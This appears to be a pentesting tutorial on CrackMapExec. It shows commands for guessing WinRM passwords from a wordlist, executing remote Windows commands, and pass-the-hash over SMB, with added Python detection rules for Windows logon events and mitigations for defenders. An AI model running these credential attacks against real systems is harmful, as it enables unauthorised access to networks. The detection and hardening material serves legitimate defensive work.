CrackMapExec (CME)
CrackMapExec: “A swiss army knife for pentesting networks…”
- CrackMapExec (a.k.a CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.
- Built with stealth in mind, CME follows the concept of “Living off the Land”: it abuses built-in Active Directory features/protocols to achieve its functionality, which allows it to evade most endpoint protection/IDS/IPS solutions.
- See the documentation for other help and examples.
Supported Protocols: WinRM, MSSQL, SMB, SSH
For help and syntax, just issue the command: crackmapexec
or…
crackmapexec -h
crackmapexec winrm -h   # (for help specific to the winrm protocol)
crackmapexec smb -h     # (for help specific to the smb protocol)
General Syntax:
crackmapexec <protocol> <target(s)> -u username -p password
Examples:
crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@'
# or...
crackmapexec <protocol> <target(s)> -u='username' -p='Admin!123@'
CME & WinRM
Syntax:
crackmapexec winrm [target ip] -u administrator -p /usr/share/.../unix_passwords.txt
You can use the -u switch to specify a file of possible user names to try.
- But if we can get into the admin account, we don't have to do privilege escalation, so we test with a single username, “administrator,” first.
- You should get a green “[+]” if successful.
Look over the output (from the top down):
- First line: you can see it actually connects to WinRM.
- NOTE: the “wsman” in the output refers to WS-Management, the protocol that WinRM (Windows Remote Management) implements.
Execute Commands: If you successfully found login credentials, you can use crackmapexec to execute arbitrary Windows commands on the target machine. Syntax:
crackmapexec winrm [target ip] -u administrator -p [password] -x "whoami"
crackmapexec winrm [target ip] -u administrator -p [password] -x "systeminfo"
You should get some happy feedback along with the results of your command execution.
systeminfo (Windows) takes a while to run but provides a lot of information about your target system.
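From the defender's side, the WinRM workflow above (a list of candidate passwords tried against one account, then a successful logon) leaves a clear trail in the target's Security log: a burst of 4625 failures from one source IP followed by a 4624 success, all with LogonType 3 (network logon, which is what WinRM and SMB produce). The following detection rule is an added example, not part of CrackMapExec or its documentation; the event records are constructed to look like the fields a SIEM extracts from 4624/4625, and the threshold and window are assumptions to tune for your environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events shaped like the fields a SIEM extracts from
# Windows Security 4625 (failed logon) and 4624 (successful logon).
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:01", "id": 4625, "user": "administrator", "ip": "10.0.0.5", "logon_type": 3},
    {"time": "2024-05-01T10:00:02", "id": 4625, "user": "administrator", "ip": "10.0.0.5", "logon_type": 3},
    {"time": "2024-05-01T10:00:03", "id": 4625, "user": "administrator", "ip": "10.0.0.5", "logon_type": 3},
    {"time": "2024-05-01T10:00:04", "id": 4625, "user": "administrator", "ip": "10.0.0.5", "logon_type": 3},
    {"time": "2024-05-01T10:00:05", "id": 4625, "user": "administrator", "ip": "10.0.0.5", "logon_type": 3},
    {"time": "2024-05-01T10:00:06", "id": 4625, "user": "administrator", "ip": "10.0.0.5", "logon_type": 3},
    {"time": "2024-05-01T10:00:07", "id": 4624, "user": "administrator", "ip": "10.0.0.5", "logon_type": 3},
    # A user mistyping a password once, then logging in: not a guessing attack.
    {"time": "2024-05-01T10:05:00", "id": 4625, "user": "alice", "ip": "10.0.0.9", "logon_type": 3},
    {"time": "2024-05-01T10:05:20", "id": 4624, "user": "alice", "ip": "10.0.0.9", "logon_type": 3},
    # Interactive console logon (LogonType 2) is out of scope for this rule.
    {"time": "2024-05-01T10:06:00", "id": 4624, "user": "bob", "ip": "-", "logon_type": 2},
]

FAIL_THRESHOLD = 5              # assumed: failed network logons from one source ...
WINDOW = timedelta(minutes=10)  # ... inside this window, before a success


def detect_guessing_then_success(events, fail_threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return one alert per source IP whose burst of failed network logons
    is followed by a successful network logon inside the window."""
    recent_failures = defaultdict(list)  # source ip -> [(time, username), ...]
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["logon_type"] != 3:
            continue
        now = datetime.fromisoformat(ev["time"])
        ip = ev["ip"]
        # Forget failures that have aged out of the window.
        recent_failures[ip] = [(t, u) for t, u in recent_failures[ip] if now - t <= window]
        if ev["id"] == 4625:
            recent_failures[ip].append((now, ev["user"]))
        elif ev["id"] == 4624 and len(recent_failures[ip]) >= fail_threshold:
            alerts.append({
                "source_ip": ip,
                "compromised_user": ev["user"],
                "failures_before_success": len(recent_failures[ip]),
                "usernames_tried": sorted({u for _, u in recent_failures[ip]}),
                "at": ev["time"],
            })
            recent_failures[ip].clear()  # one alert per burst
    return alerts


if __name__ == "__main__":
    for alert in detect_guessing_then_success(SAMPLE_EVENTS):
        print(alert)
```

The rule keys on the source IP rather than the account, so it also catches a run across many usernames (the -u file case), which shows up in `usernames_tried`. An account lockout policy and a lockout-alert on 4740 are the simpler preventive controls; where WinRM is not needed from workstations, restricting TCP 5985/5986 to management hosts removes the path entirely.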
CME & Pass-the-Hash
crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]"
This should indicate whether or not it works.
- If you get a green [+] and (Pwn3d!) then it works and you can try the execution of commands on the system…
crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]" -x "ipconfig"
It should give you visual feedback about the command execution. And there you go. Execute what you want.
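The pass-the-hash logon above looks, on the target, like any other NTLM network logon: a 4624 with LogonType 3, AuthenticationPackageName NTLM and LogonProcessName NtLmSsp, so a defender cannot tell hash from password at that single event. What can be scored is the context: NTLM used where Kerberos is expected, the built-in Administrator account (RID 500, the one the page's command uses and the one that UAC remote restrictions still let through), and, corresponding to CME's (Pwn3d!) admin check and command execution, access to administrative shares (5145 on ADMIN$ or C$). The following scorer is an added example, not CrackMapExec code; the events are constructed and the allow-list of admin jump hosts is an assumption.

```python
# Constructed events shaped like the fields a SIEM extracts from Windows
# Security 4624 (logon) and 5145 (network share object access).
SAMPLE_EVENTS = [
    # NTLM network logon as the built-in Administrator (RID 500) from a host
    # that is not an approved admin host, followed by ADMIN$ access.
    {"id": 4624, "ip": "10.0.0.5", "user": "Administrator",
     "sid": "S-1-5-21-1111-2222-3333-500", "logon_type": 3,
     "auth_pkg": "NTLM", "logon_proc": "NtLmSsp"},
    {"id": 5145, "ip": "10.0.0.5", "user": "Administrator", "share": "\\\\*\\ADMIN$"},
    # The same kind of logon from an approved admin jump host: tolerated.
    {"id": 4624, "ip": "10.0.0.20", "user": "Administrator",
     "sid": "S-1-5-21-1111-2222-3333-500", "logon_type": 3,
     "auth_pkg": "NTLM", "logon_proc": "NtLmSsp"},
    # Ordinary domain user reaching a file share via Kerberos: benign.
    {"id": 4624, "ip": "10.0.0.7", "user": "alice",
     "sid": "S-1-5-21-1111-2222-3333-1105", "logon_type": 3,
     "auth_pkg": "Kerberos", "logon_proc": "Kerberos"},
    {"id": 5145, "ip": "10.0.0.7", "user": "alice", "share": "\\\\*\\Projects"},
]

ADMIN_JUMP_HOSTS = {"10.0.0.20"}   # assumed allow-list of hosts that may admin remotely
ADMIN_SHARES = ("ADMIN$", "C$")    # shares that imply administrative access


def score_ntlm_admin_logons(events, allowlist=ADMIN_JUMP_HOSTS):
    """Score NTLM network logons by how much they look like remote admin
    access with a stolen credential. Returns one finding per suspicious logon."""
    # Source IPs that touched an administrative share (5145).
    admin_share_sources = {
        ev["ip"] for ev in events
        if ev["id"] == 5145 and ev["share"].rsplit("\\", 1)[-1].upper() in ADMIN_SHARES
    }
    findings = []
    for ev in events:
        if ev["id"] != 4624 or ev["logon_type"] != 3:
            continue
        if ev["auth_pkg"] != "NTLM" or ev["logon_proc"] != "NtLmSsp":
            continue  # Kerberos is the expected path for domain accounts
        if ev["ip"] in allowlist:
            continue
        reasons = ["ntlm_network_logon"]
        if ev["sid"].endswith("-500"):
            reasons.append("builtin_administrator_account")
        if ev["ip"] in admin_share_sources:
            reasons.append("admin_share_access")
        findings.append({
            "source_ip": ev["ip"],
            "user": ev["user"],
            "reasons": reasons,
            "severity": "high" if len(reasons) >= 3 else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in score_ntlm_admin_logons(SAMPLE_EVENTS):
        print(finding)
```

Because plain NTLM network logons are still common in most domains, the example scores rather than alerts on the first condition alone; a medium finding is a candidate for baselining, a high one for triage. The preventive controls are the usual ones for this technique: unique local administrator passwords per host (LAPS) so one hash is not valid across the estate, keeping UAC remote restrictions enabled so non-RID-500 local accounts cannot be used for remote administration, and restricting or auditing NTLM for domain accounts.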